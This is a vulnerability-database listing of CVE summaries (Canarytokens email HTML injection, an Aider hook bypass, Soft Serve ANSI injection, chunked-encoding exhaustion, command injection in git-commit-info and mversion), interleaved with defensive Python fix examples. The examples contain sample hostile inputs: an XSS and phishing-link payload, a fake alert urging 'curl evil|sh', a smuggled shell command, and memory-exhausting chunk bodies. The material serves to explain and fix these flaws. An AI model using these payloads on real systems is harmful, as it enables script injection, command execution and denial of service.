112 matches found
CVE-2026-11859 HTML injection in the Canarytoken links email
An HTML injection vulnerability in the "fetch links" email sent by Thinkst Applied Research Canarytokens, enabling Interface Manipulation, Cross-Site Scripting XSS in email clients that render HTML emails. This issue affects Canarytokens: from Docker tag sha-c0f3cf142 before sha-08c3f93d, from G...
PT-2026-48399
An HTML injection vulnerability in the "fetch links" email sent by Thinkst Applied Research Canarytokens, enabling Interface Manipulation, Cross-Site Scripting XSS in email clients that render HTML emails. This issue affects Canarytokens: from Docker tag sha-c0f3cf142 before sha-08c3f93d, from G...
CVE-2026-10729
An HTML injection vulnerability in the notification email for "Slow Redirect" and "Cloned Website" Canarytokens exists in Thinkst Applied Research Canarytokens, enabling Interface Manipulation, Cross-Site Scripting XSS in email clients that render HTML emails. This issue affects Canarytokens: fr...
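Both Canarytokens entries above describe the same bug class: an attacker-controlled string is interpolated into an HTML notification mail without escaping, so whatever markup it carries is rendered by the recipient's mail client. The following is an added example written for this listing, not Canarytokens code; the field names (memo, source URL) and the payload are constructed. It shows the vulnerable interpolation next to a hardened renderer, and includes the caveat that escaping alone does not neutralise a javascript: URL placed inside an href, so URL values also need a scheme check.

```python
import html
from urllib.parse import urlsplit

# Constructed sample input for this example: an attacker-controlled string that
# later lands in a notification mail. The "memo" field is hypothetical; no real
# Canarytokens template is reproduced here.
MALICIOUS_MEMO = ('<a href="https://attacker.example/login">Re-authenticate now</a>'
                  '<script>alert(document.cookie)</script>')


def render_vulnerable(memo: str, source_url: str) -> str:
    """The bug class in the advisories: untrusted text is interpolated straight
    into the HTML body, so any tag it contains is rendered by the mail client."""
    return (f"<p>Token memo: {memo}</p>"
            f'<p>Triggered from: <a href="{source_url}">{source_url}</a></p>')


def safe_href(url: str) -> str:
    """Escaping does not neutralise a javascript: link inside an href; restrict
    the scheme as well and fall back to an inert anchor otherwise."""
    cleaned = url.strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def render_escaped(memo: str, source_url: str) -> str:
    """Every untrusted value is HTML-escaped in text context (quote=True also
    covers attribute context); URL values are scheme-checked before going into href."""
    return (f"<p>Token memo: {html.escape(memo, quote=True)}</p>"
            f'<p>Triggered from: <a href="{safe_href(source_url)}">'
            f"{html.escape(source_url, quote=True)}</a></p>")


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_MEMO, "javascript:alert(1)"))
    print(render_escaped(MALICIOUS_MEMO, "javascript:alert(1)"))
```

In a real template engine the equivalent fix is to leave autoescaping on and never mark notification fields as safe; the scheme check on links is still needed because autoescaping only encodes characters, it does not validate URLs.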
CVE-2026-10174
A vulnerability was identified in Aider-AI Aider 0.86.3. Affected is an unknown function of the file aider/args.py of the component Pre-commit Hook Handler. Such manipulation of the argument git-commit-verify leads to protection mechanism failure. The attack may be launched remotely. The exploit ...
EUVD-2026-33494
A vulnerability was identified in Aider-AI Aider 0.86.3. Affected is an unknown function of the file aider/args.py of the component Pre-commit Hook Handler. Such manipulation of the argument git-commit-verify leads to protection mechanism failure. The attack may be launched remotely. The exploit ...
CVE-2026-10174 Aider-AI Aider Pre-commit Hook args.py protection mechanism
A vulnerability was identified in Aider-AI Aider 0.86.3. Affected is an unknown function of the file aider/args.py of the component Pre-commit Hook Handler. Such manipulation of the argument git-commit-verify leads to protection mechanism failure. The attack may be launched remotely. The exploit ...
CVE-2026-10174
Summary of CVE-2026-10174 (Aider-AI Aider 0.86.3): Affected is an unknown function in the file aider/args.py of the Pre-commit Hook Handler. Manipulation of the argument git-commit-verify leads to protection mechanism failure. The vulnerability may be exploitable remotely, with exploitation infor...
PT-2026-45183
A vulnerability was identified in Aider-AI Aider 0.86.3. Affected is an unknown function of the file aider/args.py of the component Pre-commit Hook Handler. Such manipulation of the argument git-commit-verify leads to protection mechanism failure. The attack may be launched remotely. The exploit ...
Aider security vulnerability
Aider is an open-source terminal AI pair programming tool developed by Aider AI. Version 0.86.3 of Aider contains a security vulnerability. This vulnerability stems from the git-commit-verify operation in the Pre-commit Hook Handler component, which causes the protection mechanism to fail. An...
Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')
Overview Affected versions of this package are vulnerable to Selection of Less-Secure Algorithm During Negotiation 'Algorithm Downgrade' in the TLS 1.3 session resumption logic if the subsequent ClientHello negotiates TLS 1.2 back. An attacker can gain unauthorized access by impersonating a...
Incorrect Authorization
Overview openclaw is a 🦞 OpenClaw — Personal AI Assistant Affected versions of this package are vulnerable to Incorrect Authorization in the processing of Slack interactive callbacks, specifically blockaction, viewsubmission, and viewclosed. An attacker can inject unauthorized system-event text...
CVE-2025-15586
OpenGamePanel (OGP-Website) is affected by a type juggling flaw in PHP comparisons present in commits prior to 52f865a4fba763594453068acf8fa9e3fc38d663. If exploited, this can enable authentication bypass without knowledge of the victim’s password. Public references (Red Hat CVE page, NVD entry, ...
Soft Serve does not sanitize ANSI escape sequences in user input
Impact In several places where the user can insert data e.g. names, ANSI escape sequences are not being removed, which can then be used, for example, to show fake alerts. By the same token, git messages, when printed, are also not being sanitized. Places in which this was found: 1. Repository...
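The Soft Serve advisory above concerns terminal control sequences surviving in user-supplied names and commit messages. The block below is an added example for this listing, not Soft Serve code (which is Go): it strips OSC, CSI and other ESC sequences plus remaining control characters from free text, and for identifiers such as repository or user names it rejects rather than strips, since a name that changes under sanitisation was never acceptable. The two sample strings are constructed: one clears the screen and prints a fake alert, the other hides a link behind an OSC 8 hyperlink.

```python
import re

# Matches terminal control sequences that a recipient's terminal would act on.
# Alternatives are tried in order, so complete OSC and CSI sequences are removed
# whole before the catch-all control-character class swallows a lone ESC.
ANSI_RE = re.compile(
    r"\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"       # OSC ... BEL or ESC \ (titles, OSC 8 links)
    r"|\x1b\[[0-?]*[ -/]*[@-~]"                # CSI: colours, cursor moves, clear screen
    r"|\x9b[0-?]*[ -/]*[@-~]"                  # 8-bit C1 form of CSI
    r"|\x1b[@-Z\\-_]"                          # other two-byte ESC sequences
    r"|[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]"  # remaining C0/C1 controls (keeps \t \n \r)
)


def strip_controls(text: str) -> str:
    """Remove terminal control sequences so the text is rendered literally.
    Suitable for free text such as commit messages."""
    return ANSI_RE.sub("", text)


def is_clean_identifier(text: str) -> bool:
    """For identifiers (repo or user names) reject instead of stripping.
    str.isprintable() additionally refuses format characters such as the
    bidi override U+202E, which a stripped-controls check alone would pass."""
    return bool(text) and strip_controls(text) == text and text.isprintable()


# Constructed samples for this example (not taken from the advisory).
FAKE_ALERT = "my-repo\x1b[2J\x1b[H\x1b[1;31mSECURITY ALERT: run `curl evil|sh`\x1b[0m"
FAKE_LINK = "\x1b]8;;https://attacker.example/\x1b\\click here\x1b]8;;\x1b\\"

if __name__ == "__main__":
    for sample in (FAKE_ALERT, FAKE_LINK):
        print(repr(strip_controls(sample)), is_clean_identifier(sample))
```

Stripping is the right choice only where the content must be shown anyway (a commit message); everywhere a value is an identifier, validation at input time is the check that prevents the fake-alert scenario from being stored at all.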
EUVD-2023-1813
Malicious code in bioql PyPI...
Heap-based Buffer Overflow
Overview Affected versions of this package are vulnerable to Heap-based Buffer Overflow via the ReadOneJNGImage function. An attacker can access data on the heap or cause memory corruption by tricking a user into processing a specially crafted image file. Remediation A fix was pushed into the...
Allocation of Resources Without Limits or Throttling
Overview Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Transfer-Encoding: chunked process. An attacker can exhaust server memory resources by sending specially crafted HTTP requests with chunked transfer encoding or without a...
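The entry above describes memory exhaustion through chunked transfer coding: a server that trusts declared chunk sizes, or buffers an unbounded number of chunks, can be made to allocate far more than it should. The decoder below is an added example for this listing, not code from the affected package; it checks the declared size against a body limit before copying any chunk data, bounds the chunk-size line itself, and treats malformed framing as an error. The sample bodies are constructed.

```python
MAX_BODY = 1 << 20        # 1 MiB: what this example is willing to buffer per request
MAX_SIZE_LINE = 32        # a chunk-size line longer than this is not a size, it is abuse


class ChunkedError(ValueError):
    """Raised when the chunked body is malformed or exceeds the configured limit."""


def decode_chunked(data: bytes, max_body: int = MAX_BODY) -> bytes:
    """Decode a chunked transfer-coded body, refusing to allocate beyond max_body.

    The limit is applied to the declared size before any chunk data is copied,
    so a request announcing a huge chunk, or streaming many small ones, is
    rejected without the decoder ever holding more than max_body bytes.
    Trailer fields after the zero-size chunk are ignored here.
    """
    out = bytearray()
    pos = 0
    while True:
        nl = data.find(b"\r\n", pos)
        if nl < 0:
            raise ChunkedError("truncated chunk-size line")
        if nl - pos > MAX_SIZE_LINE:
            raise ChunkedError("chunk-size line too long")
        size_field = data[pos:nl].split(b";", 1)[0].strip()   # drop chunk extensions
        if not size_field or not all(c in b"0123456789abcdefABCDEF" for c in size_field):
            raise ChunkedError("chunk size is not hexadecimal")
        size = int(size_field, 16)
        if size == 0:
            return bytes(out)
        if len(out) + size > max_body:
            raise ChunkedError(f"declared body exceeds limit of {max_body} bytes")
        start, end = nl + 2, nl + 2 + size
        if len(data) < end + 2:
            raise ChunkedError("truncated chunk data")
        if data[end:end + 2] != b"\r\n":
            raise ChunkedError("chunk data not terminated by CRLF")
        out += data[start:end]
        pos = end + 2


def decode_or_reason(data: bytes, max_body: int = MAX_BODY):
    """Convenience wrapper returning (ok, body_or_reason)."""
    try:
        return True, decode_chunked(data, max_body)
    except ChunkedError as exc:
        return False, str(exc)


# Constructed sample bodies for this example.
GOOD = b"4\r\nWiki\r\n6\r\npedia \r\n0\r\n\r\n"
HUGE = b"FFFFFFFF\r\n"                        # claims a 4 GiB chunk and sends nothing
MANY = b"1\r\nA\r\n" * 5000 + b"0\r\n\r\n"    # many tiny chunks add up

if __name__ == "__main__":
    for body in (GOOD, HUGE, MANY):
        print(decode_or_reason(body, max_body=1024))
```

The same rule applies to a streaming implementation: keep a running total of bytes accepted and compare the next declared size against the remaining budget before reading it, never after.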
CVE-2023-26134
Versions of the package git-commit-info before 2.0.2 are vulnerable to Command Injection such that the package-exported method gitCommitInfo fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once...
OPENSUSE-SU-2025:15060-1 kanidm-1.6.0~git0.d7ae0f336-1.1 on GA media
These are all security issues fixed in the kanidm-1.6.0~git0.d7ae0f336-1.1 package on the GA media of openSUSE Tumbleweed...
CVE-2020-4059
In mversion before 2.0.0, there is a command injection vulnerability. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. This vulnerability is patched by version 2.0.0. Previous releases are deprecated in npm. As a workaround,...
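The git-commit-info (CVE-2023-26134) and mversion (CVE-2020-4059) entries above are the same pattern: a caller-supplied string reaches a command executed through a shell. The block below is an added example for this listing, not code from either npm package; it shows the vulnerable string-built command beside an argument-vector form that validates the revision name against an allow-list and runs git without a shell. The regular expression, payload and helper names are constructed for the example.

```python
import re
import subprocess

# Allow-list for a revision name supplied by a caller: hex object ids or plain
# ref names. No leading '-' (would be parsed as an option), no '..' range
# syntax, and none of the shell metacharacters that drive the injection.
# Revision syntax such as HEAD~1 or HEAD^ is deliberately outside this pattern.
REF_RE = re.compile(r"^(?!-)(?!.*\.\.)[A-Za-z0-9._/-]{1,200}$")


def vulnerable_command(commit: str) -> str:
    """The pattern both advisories describe: the caller's string is pasted into a
    command line that is then run through a shell, so ';', '|' and $(...) execute."""
    return f"git show -s --format=%H {commit}"


def safe_argv(commit: str) -> list:
    """Validate first, then build an argument vector. No shell is involved and
    the trailing '--' marks where revisions end and paths would begin."""
    if not REF_RE.match(commit):
        raise ValueError(f"refusing suspicious revision name: {commit!r}")
    return ["git", "show", "-s", "--format=%H", commit, "--"]


def accepts(commit: str) -> bool:
    """True if the revision name passes the allow-list."""
    try:
        safe_argv(commit)
        return True
    except ValueError:
        return False


def commit_hash(commit: str, repo_dir: str = ".") -> str:
    """Run the safe form with shell=False; returns the full object id or ''.
    Not exercised by the tests since it needs a git repository on disk."""
    proc = subprocess.run(safe_argv(commit), cwd=repo_dir, capture_output=True,
                          text=True, timeout=10, check=False)
    return proc.stdout.strip() if proc.returncode == 0 else ""


# Constructed payload for this example (hypothetical, not from either advisory).
INJECTED = "HEAD; id > /tmp/pwned"

if __name__ == "__main__":
    print(vulnerable_command(INJECTED))   # the shell would run `id` here
    print(accepts(INJECTED), accepts("a1b2c3d"), accepts("--output=/tmp/x"))
```

Even with shell=False, a value beginning with '-' would be read by git as an option, which is why the allow-list forbids it; newer git also accepts `--end-of-options` before the revision as a second line of defence.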